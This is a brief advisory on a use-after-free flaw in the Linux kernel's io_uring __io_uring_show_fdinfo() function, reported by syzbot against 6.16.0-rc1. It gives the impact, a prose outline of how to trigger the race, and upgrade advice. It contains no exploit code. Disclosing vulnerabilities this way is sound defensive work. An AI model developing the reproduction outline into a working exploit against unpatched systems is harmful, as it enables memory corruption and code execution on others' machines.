Linux Kernel io_uring Use-After-Free Vulnerability in __io_uring_show_fdinfo()

A use-after-free vulnerability has been identified in the Linux kernel's io_uring implementation, specifically within the __io_uring_show_fdinfo() function. This vulnerability arises because the sq->thread reference is released while still being accessed, leading to a potential memory corruption issue. The problem was reported by syzbot and is associated with kernel version 6.16.0-rc1.

Impact

Exploitation of this vulnerability causes a use-after-free condition, which can lead to memory corruption and potentially allow for arbitrary code execution.

Reproduction

The vulnerability can be reproduced by creating an io_uring instance and offloading submission queue tasks to a separate thread. While the offloaded tasks are still using the submission queue thread reference, the io_uring context can be cleaned up, freeing the thread reference prematurely. This sequence of actions creates a use-after-free condition that can be exploited.

Remediation

Users can upgrade to the latest stable version of the Linux kernel where this vulnerability has been patched.